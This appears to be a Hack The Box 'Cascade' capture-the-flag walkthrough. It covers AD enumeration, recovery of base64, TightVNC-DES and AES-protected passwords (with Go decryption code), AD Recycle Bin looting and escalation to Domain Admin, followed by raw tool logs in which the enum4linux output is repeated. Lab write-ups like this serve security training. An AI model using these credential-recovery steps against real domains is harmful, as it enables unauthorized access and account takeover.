Tools: HTB - Cascade walkthrough
Initial Enumeration

A full TCP nmap scan (output below) shows a single Windows Server 2008 R2 domain controller, CASC-DC1, for the domain cascade.local: DNS, Kerberos, LDAP/LDAPS, SMB, WinRM on 5985 and the usual RPC ports. SMB signing is required, so relaying is off the table. Let's enumerate further.

We first confirm the domain with an anonymous ldapsearch against the root DSE, which returns the naming contexts for cascade.local. The server accepts anonymous LDAP binds, so as part of enumeration I searched for any object carrying the non-standard attribute cascadeLegacyPwd and got a hit on Ryan Thompson: clk0bjVldmE=. The value is base64-encoded rather than encrypted, so decoding it gives Ryan's plaintext password: rY4n5eva. Custom attributes with names like *Pwd* or *Pass* are always worth searching for; this one is a legacy attribute readable by anyone who can bind anonymously.

Now that we have a candidate credential, let's keep enumerating. A null session with rpcclient (enumdomusers) returns 15 domain users, and enum4linux-ng adds the domain SID, the password policy (minimum length 5, no complexity, no lockout threshold, so password spraying is safe here) and some interesting groups: AD Recycle Bin, Audit Share, Data Share and Remote Management Users.

Let's format the domain usernames into a list and confirm which are valid with kerbrute. Out of 15 names, 11 came back valid; the four that did not (e.crowe, b.hanson, i.croft and CascGuest) are exactly the accounts whose acb flags in the enum4linux output have the disabled bit set (0x211 and 0x215). AS-REP roasting with GetNPUsers.py turned up nothing, since no account has Kerberos pre-authentication disabled. Trying Ryan's password against the whole list shows no password re-use, but it does confirm that the r.thompson account is valid, so we have our first credentials: r.thompson:rY4n5eva.

I tried to get onto the host with evil-winrm and RDP, but no luck: r.thompson is not in Remote Management Users, and 3389 is not even open. So I checked which shares the account can READ with crackmapexec. r.thompson has read access on Data, so let's connect to it with smbclient and start enumerating.

During enumeration I found Meeting_Notes_June_2018.html in the IT folder. The note mentions a temporary account, TempAdmin, created for a migration with the same password as the normal admin account. Further enumeration turned up VNC Install.reg in the s.smith folder, a registry export that contains a TightVNC password. TightVNC "encrypts" stored passwords with DES under a fixed, publicly known key, so the hex bytes in the export are as good as plaintext; running them through a TightVNC decryptor yields the password: sT333ve2. Let's confirm with kerbrute which user the password belongs to.
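The VNC password recovery written out, as an added example that is not code from the original post or from any VNC project. It uses only Go's standard-library DES so it runs offline. The eight bytes fed to it are the "Password"=hex: value from the VNC Install.reg export that the post refers to (6b,cf,2a,4b,6e,5a,ca,0f), and the key is the fixed constant from the VNC source. The one non-obvious detail is that VNC's own DES code consumes the key with the bit order of each byte reversed relative to standard DES, so the constant has to be mirrored before a normal library produces the right plaintext.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// tightVNCKey is the fixed 8-byte DES key every VNC-family server uses to
// obfuscate the stored password. Because it is a constant in the VNC source,
// a registry export of the "encrypted" value is equivalent to the plaintext.
var tightVNCKey = [8]byte{0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07}

// reverseBits mirrors the bit order of one byte. VNC's d3des takes the key
// with the bits of each byte reversed compared with the DES standard that
// Go's crypto/des implements, so the constant above must be flipped first.
func reverseBits(b byte) byte {
	var r byte
	for i := 0; i < 8; i++ {
		r = r<<1 | b&1
		b >>= 1
	}
	return r
}

// DecryptVNCPassword takes the hex value from a VNC registry export, with or
// without the "hex:" prefix and comma separators, and returns the plaintext.
// The value is exactly one DES block, so ECB and CBC-with-zero-IV coincide.
func DecryptVNCPassword(regHex string) (string, error) {
	clean := strings.NewReplacer("hex:", "", ",", "", " ", "").Replace(regHex)
	ct, err := hex.DecodeString(clean)
	if err != nil {
		return "", err
	}
	if len(ct) != des.BlockSize {
		return "", fmt.Errorf("expected %d bytes, got %d", des.BlockSize, len(ct))
	}
	var key [8]byte
	for i, b := range tightVNCKey {
		key[i] = reverseBits(b)
	}
	block, err := des.NewCipher(key[:])
	if err != nil {
		return "", err
	}
	pt := make([]byte, des.BlockSize)
	block.Decrypt(pt, ct)
	// VNC pads passwords shorter than 8 characters with NUL bytes.
	return strings.TrimRight(string(pt), "\x00"), nil
}

func main() {
	// Value copied from the "VNC Install.reg" export found on the Data share.
	pw, err := DecryptVNCPassword("6b,cf,2a,4b,6e,5a,ca,0f")
	if err != nil {
		panic(err)
	}
	fmt.Println(pw)
}
```

The same routine works for RealVNC and UltraVNC exports, which use the identical key; only the registry path differs.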
Kerbrute reports s.smith as the owner of the newly found password sT333ve2. s.smith is a member of Remote Management Users, so this time evil-winrm works and we have a shell. Let's keep enumerating. Logging into SMB with the new credentials, the Audit share contains a DB folder with Audit.db; I downloaded it and opened it with sqlite3 on my local system. It holds credentials for the service account ArkSvc, with the password stored as BQO5l5Kj9MdErXx6Q6AGOw==. The string is clearly encrypted or encoded, and since it sits in a database next to a custom crypto DLL (CascCrypto.dll), it is most likely encrypted with a hard-coded key rather than merely encoded. I read up on how to recover such a key and concluded that the decryption logic is most likely hidden inside CascCrypto.dll, so I went hunting for it. Back on the share, CascCrypto.dll sits in the same folder as the DB, so I downloaded it and ran strings -e l CascCrypto.dll (the -e l flag dumps 16-bit little-endian strings, which is how .NET stores string literals). That returned the 16-character string 1tdyjCbY1Ix49842. That string alone is not the whole story: it is the IV the DLL hard-codes, and the 16-byte AES key is supplied by the program that calls the DLL. After a lot of reading I finally decrypted the value and got the plaintext password: w3lc0meFr31nd. We have another set of credentials: ArkSvc:w3lc0meFr31nd.
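The decryption the post arrives at, written out as an added example; this is not code from the post or from the Cascade binaries. The IV is the string the strings -e l run above pulled out of CascCrypto.dll. The key is not printed anywhere on this page: the DLL's DecryptString takes it as a parameter, and the caller, the CascAudit.exe console app stored beside the DLL and the database on the same share, passes the hard-coded value c4scadek3y654321. The block uses Go's standard library only and validates the PKCS#7 padding (the .NET Aes default) instead of trimming trailing bytes, so a wrong key almost always fails with a padding error instead of returning garbage.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"errors"
	"fmt"
)

// Constants recovered from the two binaries on the Audit share. The IV is the
// UTF-16 literal that `strings -e l CascCrypto.dll` prints; the key is passed
// into DecryptString by the caller (CascAudit.exe), not stored in the DLL.
const (
	cascKey = "c4scadek3y654321"
	cascIV  = "1tdyjCbY1Ix49842"
)

// unpadPKCS7 strips PKCS#7 padding and rejects anything malformed, which is
// the usual symptom of decrypting with the wrong key or IV.
func unpadPKCS7(b []byte, blockSize int) ([]byte, error) {
	if len(b) == 0 || len(b)%blockSize != 0 {
		return nil, errors.New("plaintext length is not a multiple of the block size")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > blockSize || n > len(b) {
		return nil, errors.New("bad padding length")
	}
	for _, p := range b[len(b)-n:] {
		if int(p) != n {
			return nil, errors.New("bad padding byte")
		}
	}
	return b[:len(b)-n], nil
}

// CascDecrypt reproduces what CascCrypto.DecryptString does: base64-decode,
// AES-128-CBC with a fixed IV, strip PKCS#7, interpret as UTF-8 text.
func CascDecrypt(b64 string, key, iv string) (string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext is not block aligned")
	}
	block, err := aes.NewCipher([]byte(key)) // 16-byte key selects AES-128
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, []byte(iv)).CryptBlocks(pt, ct)
	pt, err = unpadPKCS7(pt, aes.BlockSize)
	if err != nil {
		return "", err
	}
	return string(pt), nil
}

func main() {
	// Value taken from the ArkSvc row in Audit.db.
	pw, err := CascDecrypt("BQO5l5Kj9MdErXx6Q6AGOw==", cascKey, cascIV)
	if err != nil {
		panic(err)
	}
	fmt.Println(pw)
}
```

Because key and IV are both fixed, every password this tool ever stored in Audit.db is protected by the same secret, so recovering the key once exposes all of them; that is the design flaw the box is built around, not a weakness in AES.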
I was able to get a shell with the new password. Remember the Meeting_Notes_June_2018.html from the Data share that talked about TempAdmin. ArkSvc is a member of CASCADE\AD Recycle Bin, a group that can read deleted objects, so let's check whether the TempAdmin account is still in the recycle bin; if it is, its attributes come back with it, including any cascadeLegacyPwd (Get-ADObject with -IncludeDeletedObjects and a filter of isDeleted -eq $true lists them). We find cascadeLegacyPwd: YmFDVDNyMWFOMDBkbGVz on the deleted TempAdmin object. The string looks like base64, so let's decode it. The decoded plaintext is baCT3r1aN00dles. Now recall the line in the meeting note: "Username is TempAdmin (password is the same as the normal admin account password)". TempAdmin itself is still a deleted object and cannot log in, but the note tells us the same password was set on the normal admin account, so let's try Administrator:baCT3r1aN00dles against the host. We are Domain Admin. Game over!
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ nmap -A -p- 10.129.29.246
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-05-06 18:59 CDT
Nmap scan report for 10.129.29.246
Host is up (0.0082s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-07 00:01:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-05-07T00:02:17
|_  start_date: 2026-05-06T23:56:22
|_clock-skew: 2s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

TRACEROUTE (using port 445/tcp)
HOP RTT     ADDRESS
1   8.51 ms 10.10.14.1
2   8.66 ms 10.129.29.246

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.64 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts
#

#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
└──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -b "dc=cascade,dc=local" "(cascadeLegacyPwd=*)" cascadeLegacyPwd
# extended LDIF
#
# LDAPv3
# base <dc=cascade,dc=local> with scope subtree
# filter: (cascadeLegacyPwd=*)
# requesting: cascadeLegacyPwd
#

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE=

# search reference
ref: ldap://ForestDnsZones.cascade.local/DC=ForestDnsZones,DC=cascade,DC=local

# search reference
ref: ldap://DomainDnsZones.cascade.local/DC=DomainDnsZones,DC=cascade,DC=local

# search reference
ref: ldap://cascade.local/CN=Configuration,DC=cascade,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

└──╼ [★]$ echo "clk0bjVldmE=" | base64 -d
rY4n5eva
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.246
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
Enumerating the domain further with enum4linux-ng returns the same 15 users plus the domain SID, group list and password policy:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ enum4linux 10.129.29.246
ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.129.29.246
[*] Username ......... ''
[*] Random Username .. 'pnpssmjg'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 ======================================
|    Listener Scan on 10.129.29.246    |
 ======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 =====================================================
|    Domain Information via LDAP for 10.129.29.246    |
 =====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: cascade.local

 ============================================================
|    NetBIOS Names and Workgroup/Domain for 10.129.29.246    |
 ============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out

 ==========================================
|    SMB Dialect Check on 10.129.29.246    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: false
  SMB 3.1.1: false
Preferred dialect: SMB 2.1
SMB1 only: false
SMB signing required: true

 ============================================================
|    Domain Information via SMB session for 10.129.29.246    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: CASC-DC1
NetBIOS domain name: CASCADE
DNS domain: cascade.local
FQDN: CASC-DC1.cascade.local
Derived membership: domain member
Derived domain: CASCADE

 ==========================================
|    RPC Session Check on 10.129.29.246    |
 ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 ====================================================
|    Domain Information via RPC for 10.129.29.246    |
 ====================================================
[+] Domain: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Membership: domain member

 ================================================
|    OS Information via RPC for 10.129.29.246    |
 ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 7, Windows Server 2008 R2
OS version: '6.1'
OS release: ''
OS build: '7601'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null

 ======================================
|    Users via RPC on 10.129.29.246    |
 ======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 15 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 15 user(s) via 'enumdomusers'
[+] After merging user results we have 15 user(s) total:
'1106': username: arksvc      name: ArkSvc              acb: '0x00000210'  description: (null)
'1107': username: s.smith     name: Steve Smith         acb: '0x00000210'  description: (null)
'1109': username: r.thompson  name: Ryan Thompson       acb: '0x00000210'  description: (null)
'1111': username: util        name: Util                acb: '0x00000210'  description: (null)
'1116': username: j.wakefield name: James Wakefield     acb: '0x00000210'  description: (null)
'1121': username: s.hickson   name: Stephanie Hickson   acb: '0x00000210'  description: (null)
'1122': username: j.goodhand  name: John Goodhand       acb: '0x00000210'  description: (null)
'1124': username: a.turnbull  name: Adrian Turnbull     acb: '0x00000214'  description: (null)
'1127': username: e.crowe     name: Edward Crowe        acb: '0x00000211'  description: (null)
'1128': username: b.hanson    name: Ben Hanson          acb: '0x00000211'  description: (null)
'1129': username: d.burman    name: David Burman        acb: '0x00000210'  description: (null)
'1130': username: BackupSvc   name: BackupSvc           acb: '0x00000210'  description: (null)
'1134': username: j.allen     name: Joseph Allen        acb: '0x00000210'  description: (null)
'1135': username: i.croft     name: Ian Croft           acb: '0x00000211'  description: (null)
'501':  username: CascGuest   name: (null)              acb: '0x00000215'  description: Built-in account for guest access to the computer/domain

 =======================================
|    Groups via RPC on 10.129.29.246    |
 =======================================
[*] Enumerating local groups
[+] Found 17 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 15 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 6 group(s) via 'enumdomgroups'
[+] After merging groups results we have 38 group(s) total:
'1102': groupname: DnsAdmins                                type: local
'1103': groupname: DnsUpdateProxy                           type: domain
'1113': groupname: IT                                       type: local
'1114': groupname: Production                               type: local
'1115': groupname: HR                                       type: local
'1119': groupname: AD Recycle Bin                           type: local
'1120': groupname: Backup                                   type: local
'1123': groupname: Temps                                    type: local
'1125': groupname: WinRMRemoteWMIUsers__                    type: local
'1126': groupname: Remote Management Users                  type: local
'1132': groupname: Factory                                  type: local
'1133': groupname: Finance                                  type: local
'1137': groupname: Audit Share                              type: local
'1138': groupname: Data Share                               type: local
'498':  groupname: Enterprise Read-only Domain Controllers  type: domain
'513':  groupname: Domain Users                             type: domain
'514':  groupname: Domain Guests                            type: domain
'515':  groupname: Domain Computers                         type: domain
'517':  groupname: Cert Publishers                          type: local
'520':  groupname: Group Policy Creator Owners              type: domain
'545':  groupname: Users                                    type: builtin
'546':  groupname: Guests                                   type: builtin
'553':  groupname: RAS and IAS Servers                      type: local
'554':  groupname: Pre-Windows 2000 Compatible Access       type: builtin
'555':  groupname: Remote Desktop Users                     type: builtin
'556':  groupname: Network Configuration Operators          type: builtin
'557':  groupname: Incoming Forest Trust Builders           type: builtin
'558':  groupname: Performance Monitor Users                type: builtin
'559':  groupname: Performance Log Users                    type: builtin
'560':  groupname: Windows Authorization Access Group       type: builtin
'561':  groupname: Terminal Server License Servers          type: builtin
'562':  groupname: Distributed COM Users                    type: builtin
'568':  groupname: IIS_IUSRS                                type: builtin
'569':  groupname: Cryptographic Operators                  type: builtin
'571':  groupname: Allowed RODC Password Replication Group  type: local
'572':  groupname: Denied RODC Password Replication Group   type: local
'573':  groupname: Event Log Readers                        type: builtin
'574':  groupname: Certificate Service DCOM Access          type: builtin

 =======================================
|    Shares via RPC on 10.129.29.246    |
 =======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user

 ==========================================
|    Policies via RPC for 10.129.29.246    |
 ==========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
  Password history length: None
  Minimum password length: 5
  Maximum password age: not set
  Password properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
  Lockout observation window: 30 minutes
  Lockout duration: 30 minutes
  Lockout threshold: None
Domain logoff information:
  Force logoff time: not set

 ==========================================
|    Printers via RPC for 10.129.29.246    |
 ==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED

Completed after 6.83 seconds
Domain lockout information: Lockout observation window: 30 minutes Lockout duration: 30 minutes Lockout threshold: None
Domain logoff information: Force logoff time: not set ==========================================
| Printers via RPC for 10.129.29.246 | ==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED Completed after 6.83 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.246
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
I further enumerated the domain with enum4linux and got back some users and some domain info:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ enum4linux 10.129.29.246
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.129.29.246
[*] Username ......... ''
[*] Random Username .. 'pnpssmjg'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
======================================
| Listener Scan on 10.129.29.246 |
======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=====================================================
| Domain Information via LDAP for 10.129.29.246 |
=====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: cascade.local
============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.29.246 |
============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
==========================================
| SMB Dialect Check on 10.129.29.246 |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: false
SMB 3.1.1: false
Preferred dialect: SMB 2.1
SMB1 only: false
SMB signing required: true
============================================================
| Domain Information via SMB session for 10.129.29.246 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: CASC-DC1
NetBIOS domain name: CASCADE
DNS domain: cascade.local
FQDN: CASC-DC1.cascade.local
Derived membership: domain member
Derived domain: CASCADE
==========================================
| RPC Session Check on 10.129.29.246 |
==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
====================================================
| Domain Information via RPC for 10.129.29.246 |
====================================================
[+] Domain: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Membership: domain member
================================================
| OS Information via RPC for 10.129.29.246 |
================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 7, Windows Server 2008 R2
OS version: '6.1'
OS release: ''
OS build: '7601'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
======================================
| Users via RPC on 10.129.29.246 |
======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 15 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 15 user(s) via 'enumdomusers'
[+] After merging user results we have 15 user(s) total:
'1106': username: arksvc name: ArkSvc acb: '0x00000210' description: (null)
'1107': username: s.smith name: Steve Smith acb: '0x00000210' description: (null)
'1109': username: r.thompson name: Ryan Thompson acb: '0x00000210' description: (null)
'1111': username: util name: Util acb: '0x00000210' description: (null)
'1116': username: j.wakefield name: James Wakefield acb: '0x00000210' description: (null)
'1121': username: s.hickson name: Stephanie Hickson acb: '0x00000210' description: (null)
'1122': username: j.goodhand name: John Goodhand acb: '0x00000210' description: (null)
'1124': username: a.turnbull name: Adrian Turnbull acb: '0x00000214' description: (null)
'1127': username: e.crowe name: Edward Crowe acb: '0x00000211' description: (null)
'1128': username: b.hanson name: Ben Hanson acb: '0x00000211' description: (null)
'1129': username: d.burman name: David Burman acb: '0x00000210' description: (null)
'1130': username: BackupSvc name: BackupSvc acb: '0x00000210' description: (null)
'1134': username: j.allen name: Joseph Allen acb: '0x00000210' description: (null)
'1135': username: i.croft name: Ian Croft acb: '0x00000211' description: (null)
'501': username: CascGuest name: (null) acb: '0x00000215' description: Built-in account for guest access to the computer/domain
=======================================
| Groups via RPC on 10.129.29.246 |
=======================================
[*] Enumerating local groups
[+] Found 17 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 15 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 6 group(s) via 'enumdomgroups'
[+] After merging groups results we have 38 group(s) total:
'1102': groupname: DnsAdmins type: local
'1103': groupname: DnsUpdateProxy type: domain
'1113': groupname: IT type: local
'1114': groupname: Production type: local
'1115': groupname: HR type: local
'1119': groupname: AD Recycle Bin type: local
'1120': groupname: Backup type: local
'1123': groupname: Temps type: local
'1125': groupname: WinRMRemoteWMIUsers__ type: local
'1126': groupname: Remote Management Users type: local
'1132': groupname: Factory type: local
'1133': groupname: Finance type: local
'1137': groupname: Audit Share type: local
'1138': groupname: Data Share type: local
'498': groupname: Enterprise Read-only Domain Controllers type: domain
'513': groupname: Domain Users type: domain
'514': groupname: Domain Guests type: domain
'515': groupname: Domain Computers type: domain
'517': groupname: Cert Publishers type: local
'520': groupname: Group Policy Creator Owners type: domain
'545': groupname: Users type: builtin
'546': groupname: Guests type: builtin
'553': groupname: RAS and IAS Servers type: local
'554': groupname: Pre-Windows 2000 Compatible Access type: builtin
'555': groupname: Remote Desktop Users type: builtin
'556': groupname: Network Configuration Operators type: builtin
'557': groupname: Incoming Forest Trust Builders type: builtin
'558': groupname: Performance Monitor Users type: builtin
'559': groupname: Performance Log Users type: builtin
'560': groupname: Windows Authorization Access Group type: builtin
'561': groupname: Terminal Server License Servers type: builtin
'562': groupname: Distributed COM Users type: builtin
'568': groupname: IIS_IUSRS type: builtin
'569': groupname: Cryptographic Operators type: builtin
'571': groupname: Allowed RODC Password Replication Group type: local
'572': groupname: Denied RODC Password Replication Group type: local
'573': groupname: Event Log Readers type: builtin
'574': groupname: Certificate Service DCOM Access type: builtin
=======================================
| Shares via RPC on 10.129.29.246 |
=======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
==========================================
| Policies via RPC for 10.129.29.246 |
==========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: None
Minimum password length: 5
Maximum password age: not set
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
==========================================
| Printers via RPC for 10.129.29.246 |
==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 6.83 seconds
grep "username:" users.txt | awk '{gsub(/^\$/, "", $2); print $2}' > usernames.txt
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ./kerbrute userenum -d cascade.local domain_users.txt --dc 10.129.29.246
Version: v1.0.3 (9dad6e1) - 05/06/26 - Ronnie Flathers @ropnop
2026/05/06 19:34:50 > Using KDC(s):
2026/05/06 19:34:50 > 10.129.29.246:88
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:34:55 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
2026/05/06 19:35:00 > [+] VALID USERNAME: [email protected]
